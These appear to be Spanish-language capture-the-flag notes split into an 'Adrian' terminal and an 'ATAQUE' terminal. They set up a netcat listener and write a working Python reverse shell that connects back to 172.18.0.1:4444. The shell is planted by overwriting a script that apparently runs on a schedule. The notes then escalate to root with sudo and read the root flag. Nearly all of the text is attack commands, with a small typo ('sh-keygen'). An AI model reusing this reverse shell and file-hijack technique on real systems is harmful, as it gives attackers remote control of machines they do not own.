TERMINAL Adrian:
ssh -p 2222 daniel@localhost   
sh-keygen -R "[localhost]:2222"

TERMINAL ATAQUE:
nc -lvnp 4444

TERMINAL Adrian:
echo "import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('172.18.0.1', 4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn('/bin/bash')" > /tmp/virus.py

cat /tmp/virus.py > /home/adrian/query.py

Esperar 2 minutos...

TERMINAL ATAQUE:
Mejorar la terminal:

python3 -c 'import pty; pty.spawn("/bin/bash")'

    Hacerse Root (Admin):

sudo su

(Contraseña: adrian)

    Coger la bandera final:
cat /root/root.txt
